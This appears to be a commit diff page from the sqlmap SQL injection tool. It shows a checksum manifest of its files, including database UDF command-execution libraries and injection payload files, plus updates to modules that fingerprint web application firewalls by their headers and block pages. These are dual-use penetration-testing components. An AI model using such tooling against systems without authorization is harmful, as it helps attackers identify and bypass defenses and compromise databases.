0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py
|
||||
e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py
|
||||
ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py
|
||||
c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py
|
||||
ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py
|
||||
c690e140157d0caac5824c73688231b3 thirdparty/colorama/winterm.py
|
||||
be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py
|
||||
e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py
|
||||
2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py
|
||||
855372c870a23d46683f8aa39d75f6a1 thirdparty/gprof2dot/__init__.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/__init__.py
|
||||
e3b18f925d125bd17c7e7a7ec0b4b85f thirdparty/keepalive/__init__.py
|
||||
e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py
|
||||
49f0d123e044dd32a452e2fe51f1a9c3 thirdparty/magic/magic.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py
|
||||
03c8abc17b228e59bcfda1f11a9137e0 thirdparty/multipart/multipartpost.py
|
||||
3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py
|
||||
127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py
|
||||
08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py
|
||||
54a861de0f08bb80c2e8846579ec83bd thirdparty/oset/__init__.py
|
||||
179f0c584ef3fb39437bdb6e15d9c867 thirdparty/oset/pyoset.py
|
||||
d24924d878e24946e83cfc1459f806af thirdparty/pagerank/__init__.py
|
||||
7616693115d08f9b815a567515a0db56 thirdparty/pagerank/pagerank.py
|
||||
94a4abc0fdac64ef0661b82aff68d791 thirdparty/prettyprint/__init__.py
|
||||
ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py
|
||||
5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py
|
||||
a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py
|
||||
ec6bab337d529037fb7db0b126bce7cd thirdparty/socks/socks.py
|
||||
d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py
|
||||
ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
|
||||
855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py
|
||||
593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py
|
||||
08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_
|
||||
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
|
||||
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
|
||||
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
|
||||
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
|
||||
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
|
||||
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
|
||||
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
|
||||
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
|
||||
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
|
||||
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
|
||||
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
|
||||
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
|
||||
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
|
||||
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
|
||||
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
|
||||
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
|
||||
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
|
||||
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
|
||||
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
|
||||
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
|
||||
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
|
||||
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
|
||||
0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
|
||||
9bb247767c4ba118f2c5f0416e3e6151 waf/360.py
|
||||
deb8dd4543177479b185af8b383a8bdf waf/airlock.py
|
||||
0da662422cde266dd47cea3f5be6a309 waf/anquanbao.py
|
||||
012b4acd41f0c12df88cf0276c2afd1a waf/armor.py
|
||||
757fe0f66a24719fa596cb974ee6ae71 waf/baidu.py
|
||||
8a26fe9e0ae48e8f28272769aa7dc16e waf/barracuda.py
|
||||
826b64868a10caf1229d3bfcbbb4d594 waf/bigip.py
|
||||
3105f71b03c428f8b58cbf7a91eebff0 waf/binarysec.py
|
||||
e75422b8487f9937e050a60bc5c35896 waf/blockdos.py
|
||||
f60078f702612da43dd2a8ed07e26694 waf/ciscoacexml.py
|
||||
ac2edfa1d49b00b4bf730a9317090566 waf/cloudflare.py
|
||||
c69e1091521671452eaedf4787817ede waf/cloudfront.py
|
||||
765d0663658257ef0ab1060519c6e175 waf/comodo.py
|
||||
33633c9a2b9d53c325ba1110607d566f waf/datapower.py
|
||||
e0ad6e34b6082558e9f8f652d938c785 waf/denyall.py
|
||||
1ab6764976b3e2e28bab68cc73b5d8d9 waf/dotdefender.py
|
||||
037b715e1274fe2b4d2f31f6d24c9e77 waf/edgecast.py
|
||||
29d0c8331a4d7013d784e5dc91db49aa waf/expressionengine.py
|
||||
d50415b49d9df72cb9d193d05630ab8a waf/fortiweb.py
|
||||
c5d83d63647baa46dadf5cf992156edc waf/generic.py
|
||||
b302a688932296357fe10658a81eee0c waf/hyperguard.py
|
||||
f62b484e9083fcbf271a2b0c8f6d3528 waf/incapsula.py
|
||||
cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
|
||||
5a898cfc081236d176274c5b513d0401 waf/isaserver.py
|
||||
9689ff3faaeb2ea1837b3e04520b0e42 waf/jiasule.py
|
||||
07eb9ee33a3e31bfc74763bea8026a2b waf/knownsec.py
|
||||
32516985d3cb0aeeb1bf28062820b045 waf/kona.py
|
||||
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
|
||||
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
|
||||
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py
|
||||
4e05b8169e53edd36a6269e937958744 waf/newdefend.py
|
||||
80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
|
||||
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
|
||||
e667efa27b53191315df547e95e04fa7 waf/profense.py
|
||||
8d5609a37127782fb35af4f67b5787ee waf/proventia.py
|
||||
40125df9f8184eab1926add588762294 waf/radware.py
|
||||
fffbd039ec907274cdb6ee8e07e3cac4 waf/requestvalidationmode.py
|
||||
44bef80f1a34663c3e0a963d969d9b1f waf/safe3.py
|
||||
65a519516a597232fd902082dbcbc796 waf/safedog.py
|
||||
e8cbddfffab8b400ea03f28ebfe14536 waf/secureiis.py
|
||||
32de8507c956422926aaf13085dbcf42 waf/senginx.py
|
||||
33db1ac9a11667199c7886bbb74f6b02 waf/sitelock.py
|
||||
ff2b052672f4753be1508f2a22118631 waf/sonicwall.py
|
||||
310b6081c65fb81917b8695b013559b6 waf/sophos.py
|
||||
ade8698c8096d373034bac72069873f6 waf/stingray.py
|
||||
b372c4fcc949767c38f2bead62d07418 waf/sucuri.py
|
||||
4c02fbf63989df9ab58b04229f00f6df waf/teros.py
|
||||
b5ea5375df444e0240f1ee0e2a8e52fb waf/trafficshield.py
|
||||
89a11a755a4ea3cb71feb3f5f2b5809e waf/urlscan.py
|
||||
0569c783e3487551affe5c91aec3c6d3 waf/uspses.py
|
||||
960a8db9d3807fcd87f7f66dbfaa4628 waf/varnish.py
|
||||
98c909c8b6e50d715e5b88c639ff1836 waf/wallarm.py
|
||||
7a723ce2f1b82d7297a2ab025d5ca0be waf/webappsecure.py
|
||||
75e51fea7f206e8faa2f743e44e58383 waf/webknight.py
|
||||
3bcac085dcd9ed26b50a2320e418e9f3 waf/yundun.py
|
||||
2a57f322f0b6e7b11b8df0909816a34f waf/yunsuo.py
|
||||
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
|
||||
37603bc0905af0c65480a2ca959990ec xml/banner/generic.xml
|
||||
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
|
||||
c97c383b560cd578f74c5e4d88c88ed2 xml/banner/mysql.xml
|
||||
9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml
|
||||
0d1c881156b760492d8004bd0d926c63 xml/banner/postgresql.xml
|
||||
b07b5c47c751787e136650ded060197f xml/banner/server.xml
|
||||
e5d141fb2ba31e4eae3495554b538908 xml/banner/servlet.xml
|
||||
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
|
||||
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
|
||||
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
|
||||
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
|
||||
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
|
||||
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml
|
||||
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
|
||||
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
|
||||
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
|
||||
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml
|
||||
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml
|
||||
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml
|
||||
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml
|
||||
@@ -15,8 +15,9 @@ def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"wangzhan\.360\.cn", headers.get("X-Powered-By-360wzb", ""), re.I) is not None
|
||||
retval |= code == 493 and "/wzws-waf-cgi/" in (page or "")
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
@@ -15,8 +15,9 @@ def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"MISS", headers.get("X-Powered-By-Anquanbao", ""), re.I) is not None
|
||||
retval |= code == 405 and "/aqb_cc/error/" in (page or "")
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
21
waf/armor.py
Normal file
21
waf/armor.py
Normal file
@@ -0,0 +1,21 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.settings import WAF_ATTACK_VECTORS
|
||||
|
||||
__product__ = "Armor Protection (Armor Defense)"
|
||||
|
||||
def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
page, _, _ = get_page(get=vector)
|
||||
retval = "This request has been blocked by website protection from Armor" in (page or "")
|
||||
if retval:
|
||||
break
|
||||
|
||||
return retval
|
||||
@@ -18,7 +18,7 @@ def detect(get_page):
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
|
||||
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None
|
||||
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
@@ -18,8 +18,10 @@ def detect(get_page):
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
retval = headers.get("X-Cnection", "").lower() == "close"
|
||||
retval |= re.search(r"\ATS[a-zA-Z0-9]{3,6}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"\ATS[a-zA-Z0-9]{4,}=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= re.search(r"BigIP|BIGipServer", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
retval |= re.search(r"\AF5\Z", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
@@ -16,9 +16,14 @@ def detect(get_page):
|
||||
retval = False
|
||||
|
||||
for vector in WAF_ATTACK_VECTORS:
|
||||
_, headers, _ = get_page(get=vector)
|
||||
page, headers, code = get_page(get=vector)
|
||||
retval = re.search(r"cloudflare-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
|
||||
retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
|
||||
if code >= 400:
|
||||
retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
|
||||
retval |= headers.get("cf-ray") is not None
|
||||
retval |= re.search(r"CloudFlare Ray ID:|var CloudFlare=", page or "") is not None
|
||||
|
||||
if retval:
|
||||
break
|
||||
|
||||
|
||||
Some files were not shown because too many files have changed in this diff. Show More
Reference in New Issue
Block a user